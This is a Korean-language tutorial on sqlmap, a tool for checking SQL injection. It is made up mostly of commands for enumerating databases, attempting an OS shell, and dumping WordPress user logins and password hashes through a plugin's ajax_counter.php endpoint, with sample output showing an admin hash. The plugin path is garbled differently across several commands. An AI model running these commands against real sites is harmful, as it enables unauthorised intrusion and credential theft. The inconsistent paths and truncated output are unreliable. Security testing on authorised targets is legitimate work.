SQL 인젝션 분석 SQL Map 사용방법
Sqlmap은 SQL Injection 공격을 점검할 수 있는 툴입니다. SQL Map을 이용해서 어떻게 SQL 인젝션 공격을 점검할 수 있는지 알아보겠습니다.
https://www.binarytides.com/sqlmap-hacking-tutorial/ 여기서 튜토리얼을 확인하실 수 있습니다.
SQL 인젝션 분석 SQL Map 사용방법
1. SQL Map 설치
칼리리눅스에서 sqlmap 설치해서 진행해 보도록 하겠습니다. apt-get에서 진행할 것이기 때문에 ubuntu에서도 설치가 가능합니다.
apt-get install sqlmap
- GET 방식의 입력값 점검
sqlmap -u "http://IP/cat.php?id=1"
- GET 방식의 입력값 점검: DBMS를 알고 있는 경우
sqlmap -u "http://IP/cat.php?id=1" --dbms=mysql
- 데이터베이스 목록 열람
sqlmap -u "http://IP/cat.php?id=1" --dbs
- 데이터베이스 목록 열람
sqlmap -u "http://IP/cat.php?id=1" --dbs
- POST 방식의 입력값 점검
sqlmap -u "http://IP/admin/index.php" --data "user=USER&password=PASS"
- 특정 변수를 지정하여 점검할 경우
sqlmap -u "http://IP/admin/index.php" --data "user=USER&password=PASS" -p user
- 운영체제 명령어 실행 가능성을 점검할 때
sqlmap -u "http://IP/admin/index.php" --data "user=USER&password=PASS" --os-shell
Database명
--dbs
sqlmap -u "http://IP/wp-content/plugins/like-dand-comments/ajax_counter.php" --data "post_id=1&up_type=like" -p post_id --level=3 --dbs
Table명
-D "데이터베이스명" --tables
sqlmap -u "http://IP/wp-content/plugins/like-dcomments/ajax_counter.php" --data "post_id=1&up_type=like" -p post_id -D "데이터베이스명" --tables
sqlmap -u "http://IP/wp-content/plugins/like-dand-comments/ajax_counter.php" --data "post_id=1&up_type=like" -p post_id -D "wordpress" --tables
Column명
-D "데이터베이스명" -T "테이블명" --columns
sqlmap -u "http://IP/wp-content/plugins/like-dand-comments/ajax_counter.php" --data "post_id=1&up_type=like" -p post_id -D "데이터베이스명" -T "테이블명" --columns
sqlmap -u "http://IP/wp-content/plugins/lipages-and-comments/ajax_counter.php" --data "post_id=1&up_type=like" -p post_id -D "wordpress" -T "wp_users" --columns
Record(Filed)값
-D "데이터베이스명" -T "테이블명" -C "컬럼명,컬럼명" --dump
sqlmap -u "http://IP/wp-content/plugins/liand-comments/ajax_counter.php" --data "post_id=1&up_type=like" -p post_id -D "데이터베이스명" -T "테이블명" -C "컬럼명,컬럼명" --dump
sqlmap -u "http://IP/wp-content/plugins/nd-comments/ajax_counter.php" --data "post_id=1&up_type=like" -p post_id -D "wordpress" -T "wp_users" -C "user_login,user_pass" --dump
+------------------------------------+------------+
| user_pass | user_login |
+------------------------------------+------------+
| $P$Bj3HU7y1MCCwaO. | admin |
+------------------------------------+------------+
